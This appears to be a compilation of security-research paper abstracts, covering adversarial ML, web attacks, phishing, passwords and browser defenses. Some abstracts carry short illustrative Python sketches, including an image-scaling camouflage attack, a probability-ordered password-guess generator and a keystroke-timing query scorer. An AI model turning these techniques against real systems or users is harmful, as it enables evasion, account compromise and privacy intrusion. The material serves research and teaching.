Stack Overflow is the most popular discussion platform for software developers. Recent research found a large amount of insecure encryption code in production systems that has been inspired by examples given on Stack Overflow. By copying and pasting functional code, developers introduced exploitable software vulnerabilities into security-sensitive high-profile applications installed by millions of users every day. Proposed mitigations of this problem suffer from usability flaws and push developers back to shopping for code examples on Stack Overflow. This points us to fighting the proliferation of insecure code directly at the root, before it even reaches the clipboard. By viewing Stack Overflow as a market, implementation of cryptography becomes a decision-making problem: i.e., how to simplify the selection of helpful and secure examples. We focus on supporting software developers in making better decisions by applying nudges, a concept borrowed from behavioral science. This approach is motivated by one of our key findings: for 99.37% of insecure code examples on Stack Overflow, similar alternatives are available that serve the same use case and provide strong cryptography. Our system design is based on several nudges that are controlled by a deep neural network. It learns a representation for cryptographic API usage patterns and classification of their security, achieving an average AUC-ROC of 0.992. With a user study we demonstrate that nudge-based security advice significantly helps tackle the most popular and error-prone cryptographic use cases in Android.

Machine Learning, Adversarial and Otherwise

Seeing is Not Believing: Camouflage Attacks on Image Scaling Algorithms

Image scaling algorithms are intended to preserve the visual features of an image before and after scaling, and are commonly used in numerous visual and image processing applications. In this paper, we demonstrate an automated attack against common scaling algorithms, i.e. to automatically generate camouflage images whose visual semantics change dramatically after scaling. To illustrate the threats from such camouflage attacks, we choose several computer vision applications as targeted victims, including multiple image classification applications based on popular deep learning frameworks, as well as mainstream web browsers. Our experimental results show that such attacks can cause different visual results after scaling and thus create evasion or data-poisoning effects in these victim applications. We also present an algorithm that can successfully enable attacks against popular cloud-based image services (such as those from Microsoft Azure, Aliyun, Baidu, and Tencent) and cause obvious misclassification effects, even when the details of image processing (such as the exact scaling algorithm and scale dimension parameters) are hidden in the cloud. To defend against such attacks, this paper suggests a few potential countermeasures, from attack prevention to detection.
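
The root cause is that downscaling only samples a sparse subset of source pixels. The toy sketch below makes this concrete for plain nearest-neighbor scaling, where the effect is exact; the actual attack targets bilinear/bicubic resizing in real libraries and solves an optimization problem instead of directly overwriting pixels.

```python
import numpy as np

def nn_downscale(img, out_h, out_w):
    """Nearest-neighbor downscaling: reads only a sparse grid of pixels."""
    h, w = img.shape[:2]
    rows = np.arange(out_h) * h // out_h
    cols = np.arange(out_w) * w // out_w
    return img[rows][:, cols]

rng = np.random.default_rng(0)
benign = rng.integers(0, 256, (512, 512), dtype=np.uint8)  # stands in for a benign photo
target = rng.integers(0, 256, (64, 64), dtype=np.uint8)    # what we want after scaling

# The scaler above only ever reads these 64x64 source positions...
rows = np.arange(64) * 512 // 64
cols = np.arange(64) * 512 // 64

# ...so overwriting ~1.6% of the pixels fully controls the scaled output,
# while the full-size image still looks essentially like the benign one.
attack = benign.copy()
attack[np.ix_(rows, cols)] = target

assert np.array_equal(nn_downscale(attack, 64, 64), target)
```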

CT-GAN: Malicious Tampering of 3D Medical Imagery using Deep Learning

In 2018, clinics and hospitals were hit with numerous attacks leading to significant data breaches and interruptions in medical services. An attacker with access to medical records can do much more than hold the data for ransom or sell it on the black market. In this paper, we show how an attacker can use deep-learning to add or remove evidence of medical conditions from volumetric (3D) medical scans. An attacker may perform this act in order to stop a political candidate, sabotage research, commit insurance fraud, perform an act of terrorism, or even commit murder. We implement the attack using a 3D conditional GAN and show how the framework (CT-GAN) can be automated. Although the body is complex and 3D medical scans are very large, CT-GAN achieves realistic results which can be executed in milliseconds. To evaluate the attack, we focused on injecting and removing lung cancer from CT scans. We show how three expert radiologists and a state-of-the-art deep learning AI are highly susceptible to the attack. We also explore the attack surface of a modern radiology network and demonstrate one attack vector: we intercepted and manipulated CT scans in an active hospital network with a covert penetration test.

Misleading Authorship Attribution of Source Code using Adversarial Learning

In this paper, we present a novel attack against authorship attribution of source code. We exploit that recent attribution methods rest on machine learning and thus can be deceived by adversarial examples of source code. Our attack performs a series of semantics-preserving code transformations that mislead learning-based attribution but appear plausible to a developer. The attack is guided by Monte-Carlo tree search that enables us to operate in the discrete domain of source code. In an empirical evaluation with source code from 204 programmers, we demonstrate that our attack has a substantial effect on two recent attribution methods, whose accuracy drops from over 88% to 1% under attack. Furthermore, we show that our attack can imitate the coding style of developers with high accuracy and thereby induce false attributions. We conclude that current approaches for authorship attribution are inappropriate for practical application and there is a need for resilient analysis techniques.

Terminal Brain Damage: Exposing the Graceless Degradation in Deep Neural Networks Under Hardware Fault Attacks

Deep neural networks (DNNs) have been shown to tolerate “brain damage”: cumulative changes to the network’s parameters (e.g., pruning, numerical perturbations) typically result in a graceful degradation of classification accuracy. However, the limits of this natural resilience are not well understood in the presence of small adversarial changes to the DNN parameters’ underlying memory representation, such as bit-flips that may be induced by hardware fault attacks. We study the effects of bitwise corruptions on 19 DNN models—six architectures on three image classification tasks—and we show that most models have at least one parameter that, after a specific bit-flip in their bitwise representation, causes an accuracy loss of over 90%. For large models, we employ simple heuristics to identify the parameters likely to be vulnerable and estimate that 40–50% of the parameters in a model might lead to an accuracy drop greater than 10% when individually subjected to such single-bit perturbations. To demonstrate how an adversary could take advantage of this vulnerability, we study the impact of an exemplary hardware fault attack, Rowhammer, on DNNs. Specifically, we show that a Rowhammer-enabled attacker co-located in the same physical machine can inflict significant accuracy drops (up to 99%) even with single bit corruptions and no knowledge of the model. Our results expose the limits of DNNs’ resilience against parameter perturbations induced by real-world fault attacks. We conclude by discussing possible mitigations and future research directions towards fault attack-resilient DNNs.
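
The numerical core of the attack is that a single flip of a float32 exponent bit can inflate a small weight by dozens of orders of magnitude. A minimal illustration (the paper induces such flips in DRAM via Rowhammer; here we only simulate the effect on one value):

```python
import numpy as np

w = np.array([0.75], dtype=np.float32)   # a benign-looking model weight
bits = w.view(np.uint32)                 # same 4 bytes, reinterpreted as an integer
bits[0] ^= np.uint32(1 << 30)            # flip the most significant exponent bit
print(w[0])                              # ~2.55e+38: the weight explodes
```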

CSI NN: Reverse Engineering of Neural Network Architectures Through Electromagnetic Side Channel

Machine learning has become mainstream across industries. Numerous examples prove the validity of it for security applications. In this work, we investigate how to reverse engineer a neural network by using side-channel information such as timing and electromagnetic (EM) emanations. To this end, we consider multilayer perceptron and convolutional neural networks as the machine learning architectures of choice and assume a non-invasive and passive attacker capable of measuring those kinds of leakages.

We conduct all experiments on real data and commonly used neural network architectures in order to properly assess the applicability and extendability of those attacks. Practical results are shown on an ARM Cortex-M3 microcontroller, which is a platform often used in pervasive applications using neural networks such as wearables, surveillance cameras, etc. Our experiments show that a side-channel attacker is capable of obtaining the following information: the activation functions used in the architecture, the number of layers and neurons in the layers, the number of output classes, and weights in the neural network. Thus, the attacker can effectively reverse engineer the network using merely side-channel information such as timing or EM.

Intelligence and Vulnerabilities

Reading the Tea Leaves: A Comparative Analysis of Threat Intelligence

The term “threat intelligence” has swiftly become a staple buzzword in the computer security industry. The entirely reasonable premise is that, by compiling up-to-date information about known threats (i.e., IP addresses, domain names, file hashes, etc.), recipients of such information may be able to better defend their systems from future attacks. Thus, today a wide array of public and commercial sources distribute threat intelligence data feeds to support this purpose. However, our understanding of this data, its characterization and the extent to which it can meaningfully support its intended uses, is still quite limited. In this paper, we address these gaps by formally defining a set of metrics for characterizing threat intelligence data feeds and using these measures to systematically characterize a broad range of public and commercial sources. Further, we ground our quantitative assessments using external measurements to qualitatively investigate issues of coverage and accuracy. Unfortunately, our measurement results suggest that there are significant limitations and challenges in using existing threat intelligence data for its purported goals.

Towards the Detection of Inconsistencies in Public Security Vulnerability Reports

Public vulnerability databases such as Common Vulnerabilities and Exposures (CVE) and National Vulnerability Database (NVD) have achieved a great success in promoting vulnerability disclosure and mitigation. While these databases have accumulated massive data, there is a growing concern for their information quality and consistency.

In this paper, we propose an automated system VIEM to detect inconsistent information between the fully standardized NVD database and the unstructured CVE descriptions and their referenced vulnerability reports. VIEM allows us, for the first time, to quantify the information consistency at a massive scale, and provides the needed tool for the community to keep the CVE/NVD databases up to date. VIEM is developed to extract vulnerable software names and vulnerable versions from unstructured text. We introduce customized designs to deep-learning-based named entity recognition (NER) and relation extraction (RE) so that VIEM can recognize previously unseen software names and versions based on sentence structure and context. Ground-truth evaluation shows the system is highly accurate (0.941 precision and 0.993 recall). Using VIEM, we examine the information consistency using a large dataset of 78,296 CVE IDs and 70,569 vulnerability reports from the past 20 years. Our results suggest that inconsistent vulnerable software versions are highly prevalent. Only 59.82% of the vulnerability reports/CVE summaries strictly match the standardized NVD entries, and the inconsistency level increases over time. Case studies confirm erroneous information in NVD that either overclaims or underclaims the vulnerable software versions.
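
VIEM's extraction is done by trained NER/RE models. As a far simpler stand-in that shows the kind of structured output being compared against NVD entries, one can pull (software, version-range) pairs out of CVE-style text with a regex; the text and pattern below are illustrative only.

```python
import re

TEXT = ("Buffer overflow in the foo_parse function in libfoo before 2.4.1 "
        "and FooServer 3.0 through 3.2 allows remote attackers ...")

# A crude pattern: a software name followed by an optional range keyword
# and one or two dotted version numbers.
PATTERN = re.compile(
    r"(?P<name>[A-Za-z][\w.-]*)\s+"
    r"(?P<range>(?:before|through|prior to)?\s*\d+(?:\.\d+)+"
    r"(?:\s+through\s+\d+(?:\.\d+)+)?)")

for m in PATTERN.finditer(TEXT):
    print(m.group("name"), "->", m.group("range"))
# libfoo -> before 2.4.1
# FooServer -> 3.0 through 3.2
```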

Understanding and Securing Device Vulnerabilities through Automated Bug Report Analysis

Recent years have witnessed the rise of Internet-of-Things (IoT) based cyber attacks. These attacks, as expected, are launched from compromised IoT devices by exploiting security flaws already known. Less clear, however, are the fundamental causes of the pervasiveness of IoT device vulnerabilities and their security implications, particularly in how they affect ongoing cybercrimes. To better understand the problems and seek effective means to suppress the wave of IoT-based attacks, we conduct a comprehensive study based on a large number of real-world attack traces collected from our honeypots, attack tools purchased from the underground, and information collected from high-profile IoT attacks. This study sheds new light on the device vulnerabilities of today’s IoT systems and their security implications: ongoing cyber attacks heavily rely on these known vulnerabilities and the attack code released through their reports. We found that the reliance on known vulnerabilities can actually be used against adversaries. The same bug reports that enable the development of an attack at an exceedingly low cost can also be leveraged to extract vulnerability-specific features that help stop the attack. In particular, we leverage Natural Language Processing (NLP) to automatically collect and analyze more than 7,500 security reports (with 12,286 security critical IoT flaws in total) scattered across bug-reporting blogs, forums, and mailing lists on the Internet. We show that signatures can be automatically generated through an NLP-based report analysis, and used by intrusion detection or firewall systems to effectively mitigate the threats from today’s IoT-based attacks.

ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks

Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them. In particular, there is a need for techniques that are able to not only track how prominent certain malicious actions, such as the exploitation of specific vulnerabilities, are in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks. In this paper we present ATTACK2VEC, a system that uses word embeddings to model how attack steps are exploited in the wild, and track how they evolve. We test ATTACK2VEC on a dataset of billions of security events collected from the customers of a commercial Intrusion Prevention System over a period of two years, and show that our approach is effective in monitoring the emergence of new attack strategies in the wild and in flagging which attack steps are often used together by attackers (e.g., vulnerabilities that are frequently exploited together). ATTACK2VEC provides a useful tool for researchers and practitioners to better understand cyberattacks and their evolution, and use this knowledge to improve situational awareness and develop proactive defenses.

Web Attacks

Leaky Images: Targeted Privacy Attacks in the Web

Sharing files with specific users is a popular service provided by various widely used websites, e.g., Facebook, Twitter, Google, and Dropbox. A common way to ensure that a shared file can only be accessed by a specific user is to authenticate the user upon a request for the file. This paper shows a novel way of abusing shared image files for targeted privacy attacks. In our attack, called leaky images, an image shared with a particular user reveals whether the user is visiting a specific website. The basic idea is simple yet effective: an attacker-controlled website requests a privately shared image, which will succeed only for the targeted user whose browser is logged into the website through which the image was shared. In addition to targeted privacy attacks aimed at single users, we discuss variants of the attack that allow an attacker to track a group of users and to link user identities across different sites. Leaky images require neither JavaScript nor CSS, exposing even privacy-aware users, who disable scripts in their browser, to the leak. Studying the most popular websites shows that the privacy leak affects at least eight of the 30 most popular websites that allow sharing of images between users, including the three most popular of all sites. We disclosed the problem to the affected sites, and most of them have been fixing the privacy leak in reaction to our reports. In particular, the two most popular affected sites, Facebook and Twitter, have already fixed the leaky images problem. To avoid leaky images, we discuss potential mitigation techniques that address the problem at the level of the browser and of the image sharing website.

All Your Clicks Belong to Me: Investigating Click Interception on the Web

Clicking is the primary way in which users interact with web applications. For example, we click hyperlinks to navigate among different pages on the Web, click form submission buttons to send data to websites, and click player controls to tune video playback. Clicks are also critical in online advertising, which fuels the revenue of billions of websites. Because of the critical role of clicks in the Web ecosystem, attackers aim to intercept genuine user clicks to either send malicious commands to another application on behalf of the user or fabricate realistic ad click traffic. However, existing studies mainly consider one type of click interception in cross-origin settings via iframes, i.e., clickjacking. This does not comprehensively represent the various types of click interception that can be launched by malicious third-party JavaScript code.

In this paper, we therefore systematically investigate the click interception practices on the Web. We developed a browser-based analysis framework, Observer, to collect and analyze click related behaviors. Using Observer, we identified three different techniques to intercept user clicks on the Alexa top 250K websites, and detected 437 third-party scripts that intercepted user clicks on 613 websites, which in total receive around 43 million visits on a daily basis.

We revealed that some websites collude with third-party scripts to hijack user clicks for monetization. In particular, our analysis demonstrated that more than 36% of the 3,251 unique click interception URLs were related to online advertising, which is the primary monetization approach on the Web. Further, we discovered that users can be exposed to malicious content such as scamware through click interception. Our research demonstrates that click interception has become an emerging threat to web users.

What Are You Searching For? A Remote Keylogging Attack on Search Engine Autocomplete

Many search engines have an autocomplete feature that presents a list of suggested queries to the user as they type. Autocomplete induces network traffic from the client upon changes to the query in a web page. We describe a remote keylogging attack on search engine autocomplete. The attack integrates information leaked by three independent sources: the timing of keystrokes manifested in packet inter-arrival times, percent-encoded space characters in a URL, and the static Huffman code used in HTTP/2 header compression. While each source is a relatively weak predictor in its own right, combined, and by leveraging the relatively low entropy of the English language, up to 15% of search queries are identified among a list of 50 hypothesis queries generated from a dictionary with over 12k words. The attack succeeds despite network traffic being encrypted. We demonstrate the attack on two popular search engines and discuss some countermeasures to mitigate attack success.
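
To make the timing component concrete, here is a stripped-down sketch of scoring candidate queries against observed packet inter-arrival times. The per-digraph means and standard deviations are made up; the real attack additionally exploits percent-encoded spaces and HTTP/2 Huffman-coded header lengths.

```python
import math

# Hypothetical per-digraph inter-keystroke timing model: (mean, stddev) in seconds.
TIMING = {("t", "h"): (0.08, 0.02), ("h", "e"): (0.09, 0.02),
          ("c", "a"): (0.12, 0.03), ("a", "t"): (0.10, 0.02)}
DEFAULT = (0.15, 0.05)

def log_likelihood(word, gaps):
    """Score a candidate query against observed packet inter-arrival times."""
    if len(gaps) != len(word) - 1:
        return float("-inf")              # wrong keystroke count: reject
    score = 0.0
    for (a, b), gap in zip(zip(word, word[1:]), gaps):
        mu, sigma = TIMING.get((a, b), DEFAULT)
        score += -((gap - mu) ** 2) / (2 * sigma ** 2) - math.log(sigma)
    return score

observed = [0.081, 0.092]                 # gaps between 3 autocomplete requests
candidates = ["the", "cat", "dog"]
print(max(candidates, key=lambda w: log_likelihood(w, observed)))  # -> the
```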

Iframes/Popups Are Dangerous in Mobile WebView: Studying and Mitigating Differential Context Vulnerabilities

In this paper, we present a novel class of Android WebView vulnerabilities (called Differential Context Vulnerabilities or DCVs) associated with web iframe/popup behaviors. To demonstrate the security implications of DCVs, we devise several novel concrete attacks. We show that an untrusted web iframe/popup inside WebView becomes dangerous in that it can launch these attacks to open holes in existing defense solutions and obtain risky privileges and abilities, such as breaking web messaging integrity, stealthily accessing sensitive mobile functionality, and performing phishing attacks.

Then, we study and assess the security impacts of DCVs on real-world apps. For this purpose, we develop a novel technique, DCV-Hunter, that can automatically vet Android apps against DCVs. By applying DCV-Hunter on a large number of most popular apps, we find DCVs are prevalent. Many high-profile apps are verified to be impacted, such as Facebook, Instagram, Facebook Messenger, Google News, Skype, Uber, Yelp, and U.S. Bank. To mitigate DCVs, we design a multi-level solution that enhances the security of WebView. Our evaluation on real-world apps shows the mitigation solution is effective and scalable, with negligible overhead.

Small World with High Risks: A Study of Security Threats in the npm Ecosystem

The popularity of JavaScript has led to a large ecosystem of third-party packages available via the npm software package registry. The open nature of npm has boosted its growth, providing over 800,000 free and reusable software packages. Unfortunately, this open nature also causes security risks, as evidenced by recent incidents of single packages that broke or attacked software running on millions of computers. This paper studies security risks for users of npm by systematically analyzing dependencies between packages, the maintainers responsible for these packages, and publicly reported security issues. Studying the potential for running vulnerable or malicious code due to third-party dependencies, we find that individual packages could impact large parts of the entire ecosystem. Moreover, a very small number of maintainer accounts could be used to inject malicious code into the majority of all packages, a problem that has been increasing over time. Studying the potential for accidentally using vulnerable code, we find that lack of maintenance causes many packages to depend on vulnerable code, even years after a vulnerability has become public. Our results provide evidence that npm suffers from single points of failure and that unmaintained packages threaten large code bases. We discuss several mitigation techniques, such as trusted maintainers and total first-party security, and analyze their potential effectiveness.

Phishing and Scams

Detecting and Characterizing Lateral Phishing at Scale

We present the first large-scale characterization of lateral phishing attacks, based on a dataset of 113 million employee-sent emails from 92 enterprise organizations. In a lateral phishing attack, adversaries leverage a compromised enterprise account to send phishing emails to other users, benefitting from both the implicit trust and the information in the hijacked user’s account. We develop a classifier that finds hundreds of real-world lateral phishing emails, while generating under four false positives per one million employee-sent emails. Drawing on the attacks we detect, as well as a corpus of user-reported incidents, we quantify the scale of lateral phishing, identify several thematic content and recipient targeting strategies that attackers follow, illuminate two types of sophisticated behaviors that attackers exhibit, and estimate the success rate of these attacks. Collectively, these results expand our mental models of the ‘enterprise attacker’ and shed light on the current state of enterprise phishing attacks.

High Precision Detection of Business Email Compromise

Business email compromise (BEC) and employee impersonation have become one of the most costly cyber-security threats, causing over $12 billion in reported losses. Impersonation emails take several forms: for example, some ask for a wire transfer to the attacker’s account, while others lead the recipient to follow a link that compromises their credentials. Email security systems are not effective in detecting these attacks, because the attacks do not contain a clearly malicious payload, and are personalized to the recipient.

We present BEC-Guard, a detector used at Barracuda Networks that prevents business email compromise attacks in real-time using supervised learning. BEC-Guard has been in production since July 2017, and is part of the Barracuda Sentinel email security product. BEC-Guard detects attacks by relying on statistics about the historical email patterns that can be accessed via cloud email provider APIs. The two main challenges when designing BEC-Guard are the need to label millions of emails to train its classifiers, and to properly train the classifiers when the occurrence of employee impersonation emails is very rare, which can bias the classification. Our key insight is to split the classification problem into two parts, one analyzing the header of the email, and the second applying natural language processing to detect phrases associated with BEC or suspicious links in the email body. BEC-Guard utilizes the public APIs of cloud email providers both to automatically learn the historical communication patterns of each organization, and to quarantine emails in real-time. We evaluated BEC-Guard on a commercial dataset containing more than 4,000 attacks, and show it achieves a precision of 98.2% and a false positive rate of less than one in five million emails.
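
The split between a header classifier and a body classifier can be illustrated with deliberately tiny heuristics. This is not BEC-Guard's trained model; the employee directory, organization domain, and phrase list below are hypothetical.

```python
EMPLOYEES = {"jane doe": "jane.doe@example.com"}    # learned from mail history
ORG_DOMAIN = "example.com"
URGENT_PHRASES = ("wire transfer", "gift cards", "are you available",
                  "urgent request", "update your password")

def header_suspicious(display_name, from_addr):
    """Impersonation check: known employee name, but a foreign sender address."""
    known = EMPLOYEES.get(display_name.lower())
    return known is not None and not from_addr.lower().endswith("@" + ORG_DOMAIN)

def body_suspicious(body):
    """Text check: phrasing associated with payment fraud or credential theft."""
    text = body.lower()
    return any(phrase in text for phrase in URGENT_PHRASES)

def is_bec(display_name, from_addr, body):
    return header_suspicious(display_name, from_addr) and body_suspicious(body)

print(is_bec("Jane Doe", "jane.doe123@gmail.com",
             "Are you available? I need a wire transfer today."))  # True
```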

Cognitive Triaging of Phishing Attacks

In this paper we employ quantitative measurements of cognitive vulnerability triggers in phishing emails to predict the degree of success of an attack. To achieve this we rely on the cognitive psychology literature and develop an automated and fully quantitative method based on machine learning and econometrics to construct a triaging mechanism built around the cognitive features of a phishing email; we showcase our approach relying on data from the anti-phishing division of a large financial organization in Europe. Our evaluation shows empirically that an effective triaging mechanism for phishing success can be put in place by response teams to effectively prioritize remediation efforts (e.g. domain takedowns), by first acting on those attacks that are more likely to collect high response rates from potential victims.

Users Really Do Answer Telephone Scams

As telephone scams become increasingly prevalent, it is crucial to understand what causes recipients to fall victim to these scams. Armed with this knowledge, effective countermeasures can be developed to challenge the key foundations of successful telephone phishing attacks.

In this paper, we present the methodology, design, execution, results, and evaluation of an ethical telephone phishing scam. The study performed 10 telephone phishing experiments on 3,000 university participants without prior awareness over the course of a workweek. Overall, we were able to identify at least one key factor—spoofed Caller ID—that had a significant effect in tricking the victims into revealing their Social Security number.

Platforms in Everything: Analyzing Ground-Truth Data on the Anatomy and Economics of Bullet-Proof Hosting

This paper presents the first empirical study based on ground-truth data of a major Bullet-Proof Hosting (BPH) provider, a company called Maxided. BPH allows miscreants to host criminal activities in support of various cybercrime business models such as phishing, botnets, DDoS, spam, and counterfeit pharmaceutical websites. Maxided was legally taken down by law enforcement and its backend servers were seized. We analyze data extracted from its backend databases and connect it to various external data sources to characterize Maxided’s business model, supply chain, customers and finances. We reason about what the “inside” view reveals about potential chokepoints for disrupting BPH providers. We demonstrate the BPH landscape to have further shifted from agile resellers towards marketplace platforms with an oversupply of resources originating from hundreds of legitimate upstream hosting providers. We find the BPH provider to have few choke points in the supply chain amenable to intervention, though profit margins are very slim, so even a marginal increase in operating costs might already have repercussions that render the business unsustainable. The other intervention option would be to take down the platform itself.

Passwords

Birthday, Name and Bifacial-security: Understanding Passwords of Chinese Web Users

Much attention has been paid to passwords chosen by English speaking users, yet only a few studies have examined how non-English speaking users select passwords. In this paper, we perform an extensive, empirical analysis of 73.1 million real-world Chinese web passwords in comparison with 33.2 million English counterparts. We highlight a number of interesting structural and semantic characteristics in Chinese passwords. We further evaluate the security of these passwords by employing two state-of-the-art cracking techniques. In particular, our cracking results reveal the bifacial-security nature of Chinese passwords. They are weaker against online guessing attacks (i.e., when the allowed guess number is small, 1~10^4) than English passwords, but the remaining Chinese passwords are stronger against offline guessing attacks (i.e., when the guess number is large, >10^5) than their English counterparts. This reconciles two conflicting claims about the strength of Chinese passwords made by Bonneau (IEEE S&P’12) and Li et al. (Usenix Security’14 and IEEE TIFS’16). At 10^7 guesses, the success rate of our improved PCFG-based attack against the Chinese datasets is 33.2%~49.8%, indicating that our attack can crack 92% to 188% more passwords than the state of the art. We also discuss the implications of our findings for password policies, strength meters and cracking.
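
For readers unfamiliar with PCFG-based guessing, the sketch below shows the basic idea: passwords are modeled as structures over segment classes (letters L, digits D), and guesses are emitted in descending probability order. The structures, segments, and probabilities are toy values; the paper's improved attack adds Chinese-specific segments such as dates and Pinyin names.

```python
import heapq
import itertools

STRUCTS = {("L", "D"): 0.6, ("D", "L"): 0.4}          # e.g. "word123" vs "123word"
SEGMENTS = {"L": {"wang": 0.5, "li": 0.3, "love": 0.2},
            "D": {"123456": 0.6, "1987": 0.4}}

def guesses():
    """Yield (probability, password) in descending probability order."""
    cands = []
    for struct, p_struct in STRUCTS.items():
        pools = [SEGMENTS[t].items() for t in struct]
        for combo in itertools.product(*pools):
            p = p_struct
            for _, p_seg in combo:
                p *= p_seg
            heapq.heappush(cands, (-p, "".join(seg for seg, _ in combo)))
    while cands:
        neg_p, pw = heapq.heappop(cands)
        yield -neg_p, pw

for p, pw in itertools.islice(guesses(), 4):
    print(f"{p:.3f}  {pw}")
# 0.180  wang123456
# 0.120  123456wang
# 0.120  wang1987
# 0.108  li123456
```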

Protecting accounts from credential stuffing with password breach alerting

Protecting accounts from credential stuffing attacks remains burdensome due to an asymmetry of knowledge: attackers have wide-scale access to billions of stolen usernames and passwords, while users and identity providers remain in the dark as to which accounts require remediation. In this paper, we propose a privacy-preserving protocol whereby a client can query a centralized breach repository to determine whether a specific username and password combination is publicly exposed, but without revealing the information queried. Here, a client can be an end user, a password manager, or an identity provider. To demonstrate the feasibility of our protocol, we implement a cloud service that mediates access to over 4 billion credentials found in breaches and a Chrome extension serving as an initial client. Based on anonymous telemetry from nearly 670,000 users and 21 million logins, we find that 1.5% of logins on the web involve breached credentials. By alerting users to this breach status, 26% of our warnings result in users migrating to a new password, at least as strong as the original. Our study illustrates how secure, democratized access to password breach alerting can help mitigate one dimension of account hijacking.
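
The deployed protocol blinds Argon2 hashes with elliptic-curve keys and performs a private set intersection, which is beyond a short sketch. As a much simpler illustration of the underlying goal, querying without revealing the credential, here is a k-anonymous hash-prefix lookup in the style of Have I Been Pwned; all data is made up.

```python
import hashlib

BREACHED = {"alice:hunter2", "bob:password1"}        # server-side breach corpus

def _h(cred):
    return hashlib.sha256(cred.encode()).hexdigest()

# Server precomputes buckets keyed by a short hash prefix.
BUCKETS = {}
for cred in BREACHED:
    digest = _h(cred)
    BUCKETS.setdefault(digest[:4], set()).add(digest)

def client_check(username, password):
    digest = _h(f"{username}:{password}")
    prefix = digest[:4]                  # the only value sent to the server
    bucket = BUCKETS.get(prefix, set())  # server's reply: all digests in bucket
    return digest in bucket              # the final match happens client-side

print(client_check("alice", "hunter2"))  # True  -> warn and prompt a reset
print(client_check("alice", "horse9"))   # False
```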

Probability Model Transforming Encoders Against Encoding Attacks

Honey encryption (HE) is a novel encryption scheme for resisting brute-force attacks even when low-entropy keys (e.g., passwords) are used. HE introduces a distribution transforming encoder (DTE) to yield plausible-looking decoy messages for incorrect keys. Several HE applications have been proposed for specific kinds of messages, with specially designed probability model transforming encoders (PMTEs): DTEs built from probability models that characterize the intricate message distributions.

We propose attacks against three typical PMTE schemes. Using a simple machine learning algorithm, we propose a distribution difference attack against genomic data PMTEs, achieving 76.54%–100.00% accuracy in distinguishing real data from decoy data. We then propose a new type of attack—encoding attacks—against two password vault PMTEs, achieving 98.56%–99.52% accuracy. Different from distribution difference attacks, encoding attacks do not require any knowledge (statistics) about the real message distribution.

We also introduce a generic conceptual probability model—generative probability model (GPM)—to formalize probability models and design a generic method for transforming an arbitrary GPM to a PMTE. We prove that our PMTEs are information-theoretically indistinguishable from the corresponding GPMs. Accordingly, they can resist encoding attacks. For our PMTEs transformed from existing password vault models, encoding attacks cannot achieve more than 52.56% accuracy, which is slightly better than the randomly guessing attack (50% accuracy).
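
A DTE can be demonstrated on a toy message space: each message gets a seed range proportional to its probability, so decrypting with a wrong key still lands on a plausible message. The sketch below is an assumption-laden miniature (a three-message distribution and an XOR pad standing in for real encryption), not one of the paper's PMTEs.

```python
import secrets

SEED_SPACE = 2 ** 16
MESSAGES = [("123456", 0.50), ("password", 0.30), ("letmein", 0.20)]

# Give each message a contiguous seed range proportional to its probability.
RANGES, cursor = [], 0
for msg, p in MESSAGES:
    nxt = cursor + round(p * SEED_SPACE)
    RANGES.append((msg, cursor, nxt))
    cursor = nxt

def encode(msg):       # message -> uniformly random seed inside its range
    for m, lo, hi in RANGES:
        if m == msg:
            return lo + secrets.randbelow(hi - lo)
    raise KeyError(msg)

def decode(seed):      # any seed -> some plausible message
    for m, lo, hi in RANGES:
        if lo <= seed < hi:
            return m

def encrypt(msg, key):
    return encode(msg) ^ key             # key is a 16-bit integer here

def decrypt(ct, key):
    return decode(ct ^ key)

key = secrets.randbelow(SEED_SPACE)
ct = encrypt("password", key)
print(decrypt(ct, key))                              # password
print(decrypt(ct, secrets.randbelow(SEED_SPACE)))    # wrong key: a plausible decoy
```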

Web Defenses

Rendered Private: Making GLSL Execution Uniform to Prevent WebGL-based Browser Fingerprinting

Browser fingerprinting, a substitute for cookie-based tracking, extracts a list of client-side features and combines them into a unique identifier for the target browser. Among all these features, the one with the highest entropy, and the potential for an even sneakier purpose, i.e., cross-browser fingerprinting, is the rendering of WebGL tasks, which produces different results across different installations of the same browser on different computers and is thus considered fingerprintable.

Such WebGL-based fingerprinting is hard to defend against, because the client browser executes a program written in OpenGL Shading Language (GLSL). To date, it remains unclear, in both industry and the research community, how and why the rendering of GLSL programs can lead to result discrepancies. Therefore, all the existing defenses, such as those adopted by Tor Browser, can only disable WebGL, i.e., sacrifice functionality for privacy, to prevent WebGL-based fingerprinting.

In this paper, we propose a novel system, called UNIGL, to rewrite GLSL programs and make the WebGL rendering procedure uniform while still supporting existing WebGL functionality. In particular, we are the first in the community to point out that the rendering discrepancies exploited by state-of-the-art WebGL-based fingerprinting are caused by floating-point operations. After identifying the cause, we design UNIGL so that it redefines all the floating-point operations, either explicitly written in GLSL programs or implicitly invoked by WebGL, to mitigate the fingerprinting factors.

We implemented a prototype of UNIGL as an open-source browser add-on (https://www.github.com/unigl/). We also created a demo website (http://test.unigl.org/), i.e., a modified version of an existing fingerprinting website, which directly integrates our add-on at the server-side to demonstrate the effectiveness of UNIGL. Our evaluation using crowdsourcing workers shows that UNIGL can prevent state-of-the-art WebGL-based fingerprinting with reasonable FPSes.

Site Isolation: Process Separation for Web Sites within the Browser

Current production web browsers are multi-process but place different web sites in the same renderer process, which is not sufficient to mitigate threats present on the web today. With the prevalence of private user data stored on web sites, the risk posed by compromised renderer processes, and the advent of transient execution attacks like Spectre and Meltdown that can leak data via microarchitectural state, it is no longer safe to render documents from different web sites in the same process. In this paper, we describe our successful deployment of the Site Isolation architecture to all desktop users of Google Chrome as a mitigation for process-wide attacks. Site Isolation locks each renderer process to documents from a single site and filters certain cross-site data from each process. We overcame performance and compatibility challenges to adapt a production browser to this new architecture. We find that this architecture offers the best path to protection against compromised renderer processes and same-process transient execution attacks, despite current limitations. Our performance results indicate it is practical to deploy this level of isolation while sufficiently preserving compatibility with existing web content. Finally, we discuss future directions and how the current limitations of Site Isolation might be addressed.

Everyone is Different: Client-side Diversification for Defending Against Extension Fingerprinting

Browser fingerprinting refers to the extraction of attributes from a user’s browser which can be combined into a near-unique fingerprint. These fingerprints can be used to re-identify users without requiring the use of cookies or other stateful identifiers. Browser extensions enhance the client-side browser experience; however, prior work has shown that their website modifications are fingerprintable and can be used to infer sensitive information about users.

